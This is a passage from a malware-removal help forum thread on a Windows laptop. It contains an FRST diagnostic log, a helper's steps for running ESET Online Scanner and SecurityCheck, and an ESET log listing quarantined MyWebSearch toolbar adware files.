2010-10-20 15:45 - 2010-10-20 15:45 - 08801120 _____ () C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2013-11-04 10:17 - 2012-06-07 21:34 - 00627216 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMediaLibrary.dll
2012-06-08 11:34 - 2012-06-08 11:34 - 00016400 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvcPS.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 00344448 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWDebugDll_win32.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 00434560 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWDebug.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 00467328 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWUtils.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 32689536 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWExternLib.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 00299392 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWMainLib_win.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 06182784 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWData.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 07427456 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWApplication.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 13638016 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWMainLib.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 02259840 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWMainLibData.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 00353664 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\Kwift_DP.4.1.0.99957.dll
2014-10-28 11:22 - 2014-10-28 11:22 - 40622592 ____R () C:\Program Files (x86)\Fitbit Connect\libcef.dll
2016-01-21 12:55 - 2016-01-21 12:55 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll
2016-01-21 12:55 - 2016-01-21 12:55 - 22330368 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkyWrap.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 07:25 - 2016-03-08 16:56 - 00000056 ____A C:\WINDOWS\system32\Drivers\etc\hosts

127.0.0.1       localhost
::1             localhost

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\levilaing\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\{9deef5e1-ccab-4b3d-bca1-455b50a6a967}.jpg
DNS Servers: 8.8.8.8 - 8.8.4.4
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

HKLM\...\StartupApproved\Run32: => "Price Finder"
HKLM\...\StartupApproved\Run32: => "ShopAtHomeUpdater"
HKLM\...\StartupApproved\Run32: => "ShopAtHomeWatcher"
HKLM\...\StartupApproved\Run32: => "AdobeCS6ServiceManager"
HKLM\...\StartupApproved\Run32: => "BCSSync"
HKLM\...\StartupApproved\Run32: => "CanonQuickMenu"
HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\StartupApproved\Run: => "BitTorrent"
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\StartupApproved\Run: => "Power2GoExpress8"
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\StartupApproved\Run: => "SearchProtection"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Restore Points =========================

09-02-2016 13:53:15 Windows Update
01-03-2016 13:01:54 Windows Update
01-03-2016 13:02:55 Windows Update
08-03-2016 16:48:57 Removed Bonjour
09-03-2016 17:44:29 JRT Pre-Junkware Removal

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (03/09/2016 06:20:14 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: BITSC:\Windows\System32\bitsperf.dll8

Error: (03/09/2016 05:44:46 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.

System Error:
Access is denied.
.

Error: (03/09/2016 05:14:27 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program ns.exe version 13.0.2.6 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.

Process ID: e1c

Start Time: 01d17a55c29d78ee

Termination Time: 14

Application Path: C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\ns.exe

Report Id: a616f939-e64c-11e5-bec4-a0b3cc48869f

Faulting package full name:

Faulting package-relative application ID:

Error: (03/08/2016 04:49:01 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.

System Error:
Access is denied.
.

Error: (03/07/2016 01:17:25 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 15625

Error: (03/07/2016 01:17:25 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 15625

Error: (03/07/2016 01:17:25 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (03/07/2016 01:17:19 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 9140

Error: (03/07/2016 01:17:19 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 9140

Error: (03/07/2016 01:17:19 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second


System errors:
=============
Error: (03/09/2016 08:35:57 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: {784E29F4-5EBE-4279-9948-1E8FE941646D}

Error: (03/09/2016 08:31:42 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Access_66ab6 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (03/09/2016 08:31:42 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Storage_66ab6 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (03/09/2016 08:31:42 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Contact Data_66ab6 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (03/09/2016 08:31:42 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_66ab6 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (03/09/2016 08:31:42 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/09/2016 08:21:00 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/09/2016 07:37:13 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: {784E29F4-5EBE-4279-9948-1E8FE941646D}

Error: (03/09/2016 07:31:26 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The EraserSvc11511 service failed to start due to the following error:
%%2

Error: (03/09/2016 07:31:16 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The EgisTec Service service failed to start due to the following error:
%%1053


CodeIntegrity:
===================================
  Date: 2016-03-09 19:26:18.595
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-03-01 13:39:04.692
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-02-15 11:48:03.432
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-02-09 21:20:12.135
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-28 15:09:07.207
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-19 20:04:09.326
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-12 14:52:54.813
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-06 07:51:33.186
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2015-12-31 10:57:24.742
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2015-12-28 11:47:23.759
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.


==================== Memory info ===========================

Processor: Intel® Core™ i5-3210M CPU @ 2.50GHz
Percentage of memory in use: 37%
Total physical RAM: 6033.27 MB
Available physical RAM: 3758.48 MB
Total Virtual: 6993.27 MB
Available Virtual: 4693.2 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:669.53 GB) (Free:596.4 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (RECOVERY) (Fixed) (Total:27.14 GB) (Free:3.16 GB) NTFS ==>[system with boot components (obtained from drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 698.6 GB) (Disk ID: 5CA0CBD1)

Partition: GPT.

==================== End of Addition.txt ============================



#14
pystryker

    Trusted Helper

  • Malware Removal
  • 3,886 posts

I just did it again just to be sure.


:thumbsup: I don't see the file in the new log, so MBAM did the job. :)

Let's run a sweep for remnants and any out of date programs on the machine. How is it running?

Please disable your antivirus for the duration of my instructions. Don't forget to re-enable it after you have completed the steps.


Step 1: ESET Online Virus Scan

Please note: You can use Internet Explorer or Firefox for this step.

If you use Firefox, you will be prompted to download esetsmartinstaller_enu.exe. Please do so, then double click it to install it.

Please click on this link and then click the ESET Online Scanner bar.
  • Select the option YES, I accept the Terms of Use then click on Start
  • When prompted allow the Add-On/Active X to install.
  • Make sure that the option Remove found threats is NOT checked.
  • Make sure that the option Scan archives is checked.
  • Now click on Advanced Settings and select the following:
      • Scan for potentially unwanted applications
      • Scan for potentially unsafe applications
      • Enable Anti-Stealth Technology
  • Now click on Start
  • The virus signature database will begin to download. Be patient, this may take some time depending on the speed of your Internet connection.
  • When completed the Online Scan will begin automatically. The scan may take several hours.
  • Do not touch either the mouse or keyboard during the scan, otherwise it may stall.
  • Now click on Finish
  • Use Notepad to open the logfile located at C:\Program Files\ESET\EsetOnlineScanner\log.txt.
  • Copy and paste that log as a reply to this topic.

Step 2: SecurityCheck Scan

Download Security Check by screen317 from here or here.
  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
  • NOTE: If SecurityCheck aborts and you get the following message: UNSUPPORTED OPERATING SYSTEM! ABORTED! try rebooting the system and then run SecurityCheck again.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.

Things I need to see in your next post:
  • ESET Scan Log
  • SecurityCheck Log


#15
LLL31

    Member

  • Topic Starter
  • Member
  • 15 posts

My computer seems to be running much better now! Here is the ESET log. I am working on the security check log.

ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=907c7887564b7f4e9369d7832e800278
# end=init
# utc_time=2016-03-10 03:06:21
# local_time=2016-03-09 09:06:21 (-0600, Central Standard Time)
# country="United States"
# osver=6.2.9200 NT
Update Init
Update Download
Update Finalize
Updated modules version: 28506
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=907c7887564b7f4e9369d7832e800278
# end=updated
# utc_time=2016-03-10 03:11:16
# local_time=2016-03-09 09:11:16 (-0600, Central Standard Time)
# country="United States"
# osver=6.2.9200 NT
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7777
# api_version=3.1.1
# EOSSerial=907c7887564b7f4e9369d7832e800278
# engine=28506
# end=stopped
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
# utc_time=2016-03-10 01:19:26
# local_time=2016-03-10 07:19:26 (-0600, Central Standard Time)
# country="United States"
# lang=1033
# osver=6.2.9200 NT
# compatibility_mode_1='Norton Security'
# compatibility_mode=3604 16777213 100 97 1623627 49396892 0 0
# compatibility_mode_1=''
# compatibility_mode=5893 16776574 100 94 7054036 10504909 0 0
# scanned=127771
# found=50
# cleaned=0
# scan_time=36489
sh=1A561004F779C2C90442B67289372563F7D3030B ft=1 fh=0f13f5e05ae936b5 vn="Win32/Toolbar.MyWebSearch.T potentially unwanted application" ac=I fn="C:\FRST\Quarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\NP5zStub.dll.xBAD"
sh=99DF98DFEF4B483889FA88162D20EE46340A5DBE ft=1 fh=e6e2c196b2ffcb6f vn="Win32/Toolbar.MyWebSearch.W potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zauxstb.dll.vir"
sh=0FF3588ECB69D2B18C6FAEC012672CA2F60314F6 ft=1 fh=731190b7425307d6 vn="Win32/Toolbar.MyWebSearch.W potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zbprtct.dll.vir"
sh=0F78FE90AF015B0A511EDE007BD1791A341E891E ft=1 fh=d4fd6df3b7cf992d vn="Win32/Toolbar.MyWebSearch.W potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zbrmon.exe.vir"
sh=12FF3195BDACA5482034AAC3C3E132D5ADA421A9 ft=1 fh=982f80d197512813 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zbrstub.dll.vir"
sh=BAEFCB03679575349E01668C4F0938643BAAA022 ft=1 fh=45ba6b521529362d vn="a variant of Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zdatact.dll.vir"
sh=0C88EFCFA1C77D597111125A6C031CEB47B18BA7 ft=1 fh=b856def4c7346ea3 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zdlghk.dll.vir"
sh=8090E240F528004402B29C11E5072BED79D95384 ft=1 fh=73e118282d8d3c4a vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zdyn.dll.vir"
sh=2CA2EA6CF1AD1FE87C25D4AB6B1C7729E48C6390 ft=1 fh=a34a8b9082c46c86 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zfeedmg.dll.vir"
sh=9788294F2B8AB28DBAE4C73BB61A6B1200BDD89D ft=1 fh=af8ed8fd644fe8ac vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zhighin.exe.vir"
sh=9D54BAF23397E5F1444BC6471052AD234B76FBD3 ft=1 fh=2ab58862c927227b vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zhkstub.dll.vir"
sh=978867B422339E68971E56C49C66F14F2ACD745D ft=1 fh=dd289cd2c7a55037 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zhttpct.dll.vir"
sh=DC971C75FFCE77CC952FB6660A2603E09D62D4D9 ft=1 fh=ac2f97e786bfc982 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zidle.dll.vir"
sh=92AC05FFF3AD68271062A3DCB87E12EE6B816DDB ft=1 fh=acec1e59f99ab2fd vn="a variant of Win32/Toolbar.MyWebSearch.P potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zieovr.dll.vir"
sh=AFCAAC5845D81A407C63733E4A7D007167F96BE8 ft=1 fh=02b0c8de8c8e9f1e vn="Win32/Toolbar.MyWebSearch.W potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zimpipe.exe.vir"
sh=556C4FCA5D890F17B7B5040A601B42452A205E29 ft=1 fh=0f2a31b21601aeb5 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zmedint.exe.vir"
sh=3EB4A6A25199E6339EC04F36189C71738DE63CE7 ft=1 fh=eafb3b5bfaf84345 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zmlbtn.dll.vir"
sh=DFD07B722E317D1CDDAAB7D5B31BFAB57CC5E739 ft=1 fh=507b4871517a4ad4 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zmsg.dll.vir"
sh=CBF93E0F6FF8AE054C18BDBE477CBFAF9F467CF9 ft=1 fh=f7d96c65ea0021a5 vn="a variant of Win32/Toolbar.MyWebSearch potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zPlugin.dll.vir"
sh=77C8DC985373B1E5D9035ECB3A831C7DD1ABFD55 ft=1 fh=e1f880731de07609 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zradio.dll.vir"
sh=C5F26031D5E0C487BFF0D60AA44603135BF60395 ft=1 fh=a846ae5344ec78c3 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zregfft.dll.vir"
sh=A2F202F68FEF2A31E9FE3AE124A46B908349778C ft=1 fh=bf17c6b7704b10fd vn="Win32/Toolbar.MyWebSearch.W potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zreghk.dll.vir"
sh=65D604A070334183E5034CDEEC5838E46D705794 ft=1 fh=3d9a604351eb1640 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zregiet.dll.vir"
sh=72E48F7F37E208A52AD975EAECAB29FC50223C27 ft=1 fh=958a563919bf5cc2 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zscript.dll.vir"
sh=857980A7B7AB77FF8E34A090CCD76B8BA628E7E4 ft=1 fh=6c9ac10ea3ee1cdd vn="a variant of Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zskin.dll.vir"
sh=496310EE0816B49176E03226DB102FAE9AA452B4 ft=1 fh=ceffc168909c0690 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zsknlcr.dll.vir"
sh=F5946D49A70A64072739370E7BAD592FE4799EA1 ft=1 fh=5bc3efb780caf8fa vn="Win32/Toolbar.MyWebSearch.W potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zskplay.exe.vir"
sh=BE21D76E502D546B2D88093E13F07923EB59380B ft=1 fh=7424967c664ed914 vn="a variant of Win32/Toolbar.MyWebSearch.AC potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zSrcAs.dll.vir"
sh=8ACE75F6C2417666AD9D60837B72D78B394C3944 ft=1 fh=ae6d89138faf571c vn="Win32/Toolbar.MyWebSearch.W potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zSrchMn.exe.vir"
sh=110033F4A78DCA521E8BA73F75747E4E3B6AE545 ft=1 fh=21686246ae128bdd vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zuabtn.dll.vir"
sh=630D5FC9ACC4932C87263895F554F8C3CB6D4B4A ft=1 fh=b81ce565a99a556c vn="Win64/Toolbar.MyWebSearch.A potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\AppIntegrator64.exe.vir"
sh=374E378A91209732B48C8416D1E9805E98FDCFA9 ft=1 fh=6da58ad1308c1c96 vn="Win64/Toolbar.MyWebSearch.A potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\AppIntegratorStub64.dll.vir"
sh=6902D246F8FC2457C9AE369B094292DE6EB454BC ft=1 fh=b1be847bff3fcf8f vn="a variant of Win32/Toolbar.MyWebSearch.W potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\CREXT.DLL.vir"
sh=FF9F058B12B6C4D9B6256304FA9078E391C7F32C ft=1 fh=6022d103b074fe9f vn="a variant of Win32/Toolbar.MyWebSearch.Z potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\CrExtP5z.exe.vir"
sh=244414D9D39E114E7989C3B35A5FF038508ECFC1 ft=1 fh=0cbd734d892ac7d4 vn="a variant of Win32/Toolbar.MyWebSearch.AI potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\DPNMNGR.DLL.vir"
sh=6FF50369661027A1CD5F5E465F78C78913FF84CC ft=1 fh=c941e5f2ec9d2835 vn="a variant of Win32/Toolbar.MyWebSearch.AI potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\EXEMANAGER.DLL.vir"
sh=3D7CD376DFDB97512A376E85FBB7F04344C051B6 ft=1 fh=e0ed2601e18686d8 vn="Win64/Toolbar.MyWebSearch.A potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\Hpg64.dll.vir"
sh=2F938D8C9A5D3C9C239793346D43193BA1CBFCD6 ft=1 fh=929bde520a5aa0d2 vn="a variant of Win32/Toolbar.MyWebSearch.AU potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\T8EXTEX.DLL.vir"
sh=B8944722E8D577E67925DD4A72D1D8E44C3BC6CA ft=1 fh=6f8a20cf4b11d7b0 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\T8EXTPEX.DLL.vir"
sh=2E85C71E79C5B2A65D8CCDD5B21AFE559102062F ft=1 fh=68336e5d9907ad1c vn="a variant of Win32/Toolbar.MyWebSearch.AC potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\T8TICKER.DLL.vir"
sh=D0787BEAE97CE99982E7F5000772831421FD48E4 ft=1 fh=b650850bda28ebe2 vn="a variant of Win32/Toolbar.MyWebSearch.AU potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\VERIFY.DLL.vir"
sh=499E228EDD239496AC4401619894F45BEB39CB25 ft=1 fh=11b6a11b071ec76e vn="Win32/Toolbar.MyWebSearch potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5zEI\Installr\1.bin\5zEIPlug.dll.vir"
